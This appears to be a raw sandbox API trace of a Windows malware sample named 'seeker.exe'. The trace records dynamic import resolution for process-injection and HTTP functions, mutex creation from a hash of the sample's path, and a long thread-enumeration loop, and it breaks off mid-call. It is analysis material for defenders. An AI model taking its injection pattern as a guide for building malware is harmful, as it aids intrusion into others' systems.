AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 243 os_tid = 0x9bc Thread: id = 244 os_tid = 0x1e8 Thread: id = 246 os_tid = 0xa6c [0168.912] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0168.912] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0168.913] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0168.913] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0168.913] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0168.913] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0168.913] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0168.913] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0168.913] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0168.913] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0168.913] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0168.913] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0168.913] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0168.913] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0168.913] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0168.914] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0168.914] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0168.914] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0168.914] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0168.914] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0168.914] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0168.914] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0168.914] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0168.914] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0168.914] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0168.914] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0168.914] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0168.914] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0168.914] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0168.915] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0168.915] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0168.915] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0168.915] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0168.915] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0168.915] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0168.915] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0168.915] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0168.915] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0168.915] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0168.915] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0168.915] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0168.915] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0168.916] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0168.916] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0168.916] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0168.916] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0168.916] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0168.924] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0168.924] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0168.924] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0168.928] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0168.928] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0168.928] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0168.929] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0168.929] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0168.929] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0168.929] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0168.929] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0168.929] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0168.929] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0168.929] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0168.929] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0168.932] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0168.932] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0168.932] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0168.932] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0168.932] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0168.932] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0168.932] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0168.932] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0168.933] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0168.933] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0168.933] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0168.933] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0168.933] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0168.933] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0168.933] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0168.933] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0168.933] VirtualProtect (in: lpAddress=0x1c0000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0xcafde8 | out: lpflOldProtect=0xcafde8*=0x40) returned 1 [0168.933] VirtualProtect (in: lpAddress=0x1c0000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0xcafde8 | out: lpflOldProtect=0xcafde8*=0x4) returned 1 [0168.935] VirtualQuery (in: lpAddress=0x1d0016, lpBuffer=0xcafde0, dwLength=0x1c | out: lpBuffer=0xcafde0*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0168.935] GetProcessHeap () returned 0x6e0000 [0168.935] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x364) returned 0x700568 [0168.935] RtlMoveMemory (in: Destination=0x700568, Source=0x1d0016, Length=0x363 | out: Destination=0x700568) [0168.935] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x1d0016) returned 0x0 [0168.935] GetCurrentProcessId () returned 0x314 [0168.935] GetProcessHeap () returned 0x6e0000 [0168.935] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x105) returned 0x7008d8 [0168.935] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x7008d8, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Photo Viewer\\seeker.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\seeker.exe")) returned 0x36 [0168.935] GetProcessHeap () returned 0x6e0000 [0168.935] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x105) returned 0x7009e8 [0168.935] GetCurrentProcessId () returned 0x314 [0168.935] wsprintfA (in: param_1=0x7009e8, param_2="%s%d%d%d" | out: param_1="C:\\Program Files (x86)\\Windows Photo Viewer\\seeker.exe3708421247883") returned 67 [0168.935] CryptAcquireContextA (in: phProv=0xcafde4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xcafde4*=0x700b38) returned 1 [0168.950] CryptCreateHash (in: hProv=0x700b38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xcafde8 | out: phHash=0xcafde8) returned 1 [0168.950] lstrlenA (lpString="C:\\Program Files (x86)\\Windows Photo Viewer\\seeker.exe3708421247883") returned 67 [0168.950] CryptHashData (hHash=0x701468, pbData=0x7009e8, dwDataLen=0x43, dwFlags=0x0) returned 1 [0168.950] CryptGetHashParam (in: hHash=0x701468, dwParam=0x2, pbData=0xcafdd4, pdwDataLen=0xcafdec, dwFlags=0x0 | out: pbData=0xcafdd4, pdwDataLen=0xcafdec) returned 1 [0168.950] wsprintfA (in: param_1=0x7009e8, param_2="%02X" | out: param_1="27") returned 2 [0168.950] wsprintfA (in: param_1=0x7009ea, param_2="%02X" | out: param_1="20") returned 2 [0168.950] wsprintfA (in: param_1=0x7009ec, param_2="%02X" | out: param_1="29") returned 2 [0168.950] wsprintfA (in: param_1=0x7009ee, param_2="%02X" | out: param_1="F7") returned 2 [0168.950] wsprintfA (in: param_1=0x7009f0, param_2="%02X" | out: param_1="9E") returned 2 [0168.950] wsprintfA (in: param_1=0x7009f2, param_2="%02X" | out: param_1="C0") returned 2 [0168.950] wsprintfA (in: param_1=0x7009f4, param_2="%02X" | out: param_1="A2") returned 2 [0168.950] wsprintfA (in: param_1=0x7009f6, param_2="%02X" | out: param_1="EA") returned 2 [0168.950] wsprintfA (in: param_1=0x7009f8, param_2="%02X" | out: param_1="E0") returned 2 [0168.950] wsprintfA (in: param_1=0x7009fa, param_2="%02X" | out: param_1="AF") returned 2 [0168.950] wsprintfA (in: param_1=0x7009fc, param_2="%02X" | out: param_1="83") returned 2 [0168.950] wsprintfA (in: param_1=0x7009fe, param_2="%02X" | out: param_1="16") returned 2 [0168.950] wsprintfA (in: param_1=0x700a00, param_2="%02X" | out: param_1="64") returned 2 [0168.950] wsprintfA (in: param_1=0x700a02, param_2="%02X" | out: param_1="09") returned 2 [0168.950] wsprintfA (in: param_1=0x700a04, param_2="%02X" | out: param_1="28") returned 2 [0168.950] wsprintfA (in: param_1=0x700a06, param_2="%02X" | out: param_1="04") returned 2 [0168.950] CryptDestroyHash (hHash=0x701468) returned 1 [0168.950] CryptReleaseContext (hProv=0x700b38, dwFlags=0x0) returned 1 [0168.950] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="272029F79EC0A2EAE0AF831664092804") returned 0x80 [0168.951] GetLastError () returned 0x0 [0168.951] Sleep (dwMilliseconds=0x1f4) [0169.566] GetCurrentProcessId () returned 0x314 [0169.566] GetCurrentThreadId () returned 0xa6c [0169.567] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0169.569] Thread32First (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.570] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.570] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.570] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.571] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.571] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.571] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.572] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.572] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.572] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.572] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.573] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.573] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.573] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.573] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.574] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.574] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.574] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.575] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.575] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.575] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.575] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.576] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.576] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.576] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.577] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.577] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.577] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.577] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.578] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.578] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.578] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.579] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.579] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.579] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.580] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.580] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.580] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.581] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.581] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.581] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.582] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.582] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.582] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.582] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.583] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.583] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.583] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.584] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.584] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.584] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.584] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.585] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.585] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.585] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.586] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.586] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.586] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.587] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.587] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.587] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.588] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.588] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.588] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.588] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.589] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.589] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.589] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.590] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.590] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.590] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.591] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.591] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.591] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.591] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.592] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.592] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.592] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.593] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.593] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.593] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.594] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.594] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.594] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.594] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.595] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.595] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.595] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.596] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.596] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.596] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.597] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.597] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.597] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.597] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.598] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.598] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.598] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.599] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.599] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.599] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.600] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.600] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.600] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.600] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.601] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.601] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.601] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.601] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.602] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.602] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.602] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.603] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.603] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.603] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.604] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.604] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.604] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.604] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.605] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.605] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.605] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.606] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.606] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.606] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.606] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.607] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.607] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.607] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.608] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.608] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.608] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.608] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.609] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.609] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.609] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.610] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.610] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.610] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.610] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.611] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.611] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.611] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.748] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.749] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.749] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.749] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.749] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.750] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.750] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.750] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.751] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.751] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.751] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.751] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.752] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.752] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.752] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.753] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.753] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.753] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.753] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.754] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.754] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.754] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.755] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.755] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.755] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.755] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.756] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.756] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.756] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.756] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.757] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.757] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.757] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.758] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.758] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.758] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.758] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.759] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.759] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.759] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.759] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.760] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.760] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.760] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.761] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.761] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.761] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.761] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.762] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.762] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.762] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.762] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.763] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.763] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.763] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.764] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.764] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.764] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.764] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.765] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.765] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.765] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.765] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.766] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.766] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.766] Thread32Next 